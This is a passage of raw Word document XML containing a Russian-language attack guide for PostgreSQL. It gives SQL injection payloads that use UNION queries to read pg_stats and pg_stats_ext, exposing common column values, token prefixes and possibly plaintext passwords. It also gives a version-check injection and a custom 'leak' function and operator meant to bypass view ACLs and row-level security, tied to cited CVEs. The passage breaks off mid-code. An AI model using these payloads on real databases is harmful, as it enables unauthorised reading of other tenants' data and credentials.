          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE schemaname = 'public'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND tablename = 'users'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND most_common_vals IS NOT NULL --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что атакующий получает в колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">value</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country    {US,UK,DE,FR,RU,IN,BR,CA,AU,JP}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">role       {viewer,editor,admin,owner}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">email_domain {gmail.com,yahoo.com,outlook.com,company.com,hotmail.com}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">plan       {free,starter,pro,enterprise}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для колонок с большой кардинальностью (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">email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 — массив пуст или короткий. Для enum-подобных колонок — почти всегда полный список реально использующихся значений. Для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (если по ошибке хранится открытым текстом) — топ-10 наиболее популярных паролей по кластеру, без необходимости перебирать строки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">most_common_freqs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (параллельный массив </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">real[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — частоты для каждого из MCV; полезно для оценки распределения. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">histogram_bounds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — границы гистограммы для колонок с числовым/упорядоченным типом (квантильные значения).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ANALYZE-частота управляется autovacuum-ом;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обновляется не мгновенно, но статистика типично свежее суток.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — обход ACL через `pg_stats_ext` (R17 CVE-2024-4317)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Применим на непатченных кластерах: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 14 ≤ 14.11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">15 ≤ 15.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">16 ≤ 16.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Атакующий — application-роль без SELECT на чужую колонку — читает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чужой таблицы через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Версионная проверка перед payload-ом</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (через 3.8.4 Payload B):</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'version='||current_setting('server_version_num'), 0 --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если результат &lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">140012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150007</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160003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (для соответствующего мажора) — CVE применима. Дополнительно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">даже если бинарь обновлён</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, без ручного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уязвимый view-определение остаётся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pg_upgrade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не пересоздают системные views).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>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statistics_name, most_common_vals::text FROM pg_stats_ext WHERE most_common_vals IS NOT NULL --</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value FROM widgets WHERE name = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0, statistics_name, most_common_vals::text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_stats_ext</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE most_common_vals IS NOT NULL --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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возвращает строки даже для тех колонок, на которые у атакующей роли нет SELECT-права — это и есть суть R17. Преимущество перед обычным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хранятся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">многоколонные</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> MCV (если в кластере выполнен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE STATISTICS ... (mcv) ON col1, col2 FROM tbl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), и они тоже утекают. Для приложений, которые создают extended statistics для оптимизации (Django/Rails иногда генерируют их через миграции) — это утечка комбинаций значений, не только одиночных.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что в выводе видно атакующему:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> конкретные значения колонок из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tbl1.col1</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tbl1.col2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, на которые у его роли нет SELECT-прав. Например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_42.api_keys.token_prefix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{ak_live_, sk_test_, ak_dev_}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это уже сильный сигнал, какие префиксы токенов выдаёт система; в комбинации с другими утечками — путь к подбору.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — обход view ACL / RLS через custom operator (R26 CVE-2025-8713)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Применим на: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 13 ≤ 13.21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">14 ≤ 14.18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">15 ≤ 15.13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">16 ≤ 16.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">17 ≤ 17.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Не зависит от R17, отдельная цепочка. Принцип: атакующий создаёт custom operator/function, использует его в WHERE против view (с ACL-фильтром) или RLS-таблицы, planner вызывает функцию для оценки selectivity и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">передаёт ей сырые значения из pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> до применения ACL/RLS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Концептуальный payload (требует CREATE FUNCTION в схеме атакующего, недоступен из чистой SQLi без 3.13):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- На стороне атакующего: подготовка собственной функции-collector</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public.leak(anyelement) RETURNS bool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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RAISE NOTICE 'leaked: %', $1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RETURN true;</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CREATE OPERATOR public.&lt;&lt;&lt;&lt; (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  PROCEDURE = public.leak,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  LEFTARG = anyelement, RIGHTARG = anyelement,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
